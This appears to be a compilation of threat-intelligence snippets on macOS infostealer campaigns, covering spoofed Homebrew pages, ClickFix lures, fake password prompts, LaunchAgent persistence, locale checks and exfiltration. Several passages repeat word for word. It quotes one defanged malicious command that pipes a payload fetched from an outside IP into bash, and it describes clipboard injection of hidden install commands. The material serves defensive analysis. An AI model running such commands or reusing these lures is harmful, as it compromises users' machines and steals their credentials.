Cuckoo Stealer

Volt Typhoon has obtained the victim's system current location.

Victims are directed to high-fidelity, deceptive web interfaces that simulate legitimate services.

Iru Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware.

Initial commands leverage curl to fetch obfuscated payloads, which are piped directly into shell interpreters (bash/zsh), minimizing the disk footprint.

ClickFix variant that uses the applescript:// URL scheme to invoke the macOS Script Editor... This URL-encoded hyperlink runs a dual-track routine... while silently executing the curl command in the background to deliver an infostealer, bypassing Gatekeeper via user-coerced interaction.

before we published the post, it was updated to include a malicious, base64-encoded cURL payload... Command curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &

Attackers exploit this trust by providing malicious command strings that mimic legitimate installation procedures.

Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.

LoginHooks and LogoutHooks have been around for a long time and can still be used to run a persistence script on macOS. When a person logs in or out, these mechanisms run code, as the names suggest.

Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.

LoginHooks and LogoutHooks have been around for a long time and can still be used to run a persistence script on macOS. When a person logs in or out, these mechanisms run code, as the names suggest.

The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.

Long-term access is secured via LaunchAgents and .plist files, often masquerading as legitimate system or software updaters.

The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'

DarkGate queries system locale information during execution. Later versions of DarkGate query GetSystemDefaultLCID for locale information to determine if the malware is executing in Russian-speaking countries.

Bundlore prompts the user for their credentials. Calisto presents an input prompt asking for the user's login and password. Cuckoo Stealer has captured passwords by prompting victims with a "macOS needs to access System Settings" GUI window. Dok prompts the user for credentials. FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials. iKitten prompts the user for their credentials. Keydnap prompts the users for credentials. Proton prompts users for their credentials. RedCurl prompts the user for credentials through a Microsoft Outlook pop-up. SILENTTRINITY's credphisher.py module can prompt a current user for their credentials. XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.

Exfiltration efforts focus on high-value data, including ... messaging session tokens (Telegram/Discord)

Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox), macOS Keychains

Exfiltration efforts focus on high-value data, including ... macOS Keychains

Exfiltration efforts focus on high-value data, including browser credentials (Chromium/Firefox)

Subsequent stages often involve a native-looking password prompt to facilitate credential harvesting under the guise of installation continuity.

The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.

DarkGate queries system locale information during execution. Later versions of DarkGate query GetSystemDefaultLCID for locale information to determine if the malware is executing in Russian-speaking countries.

"Bazar can query the Registry for installed applications." / "BRONZE BUTLER has used tools to enumerate software installed on an infected host." / "LightSpy ... enumerate the Applications folder to collect the bundle name, bundle identifier, and version information..." / "Volt Typhoon has queried the Registry on compromised systems for information on installed software."

"Amadey does not run any tasks or install additional malware if the victim machine is based in Russia"; "DarkGate queries system locale information... determine if the malware is executing in Russian-speaking countries"; "Ragnar Locker checks... GetLocaleInfoW and doesn't encrypt files if it finds a former Soviet country"; "Saint Bot has conducted system locale checks..."

Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States (CIS) entities... Bazar can perform a check to ensure that the operating system's keyboard and language settings are not set to Russian... Clop has checked the keyboard language using the GetKeyboardLayout() function... Ryuk has been observed to query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language and the value InstallLanguage.

Bundlore prompts the user for their credentials. Calisto presents an input prompt asking for the user's login and password. Cuckoo Stealer has captured passwords by prompting victims with a "macOS needs to access System Settings" GUI window. Dok prompts the user for credentials. FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials. iKitten prompts the user for their credentials. Keydnap prompts the users for credentials. Proton prompts users for their credentials. RedCurl prompts the user for credentials through a Microsoft Outlook pop-up. SILENTTRINITY's credphisher.py module can prompt a current user for their credentials. XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process /Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment.

The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.

Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard, outside of what is shown to the user on the webpage, which downloads a malicious payload in parallel with the Homebrew installer.

The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.

Initial commands leverage curl to fetch obfuscated payloads

ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.

By presenting deceptive "fixes," "verifications," or installation prompts, adversaries induce users to manually execute malicious scripts via native utilities such as the Terminal or Script Editor.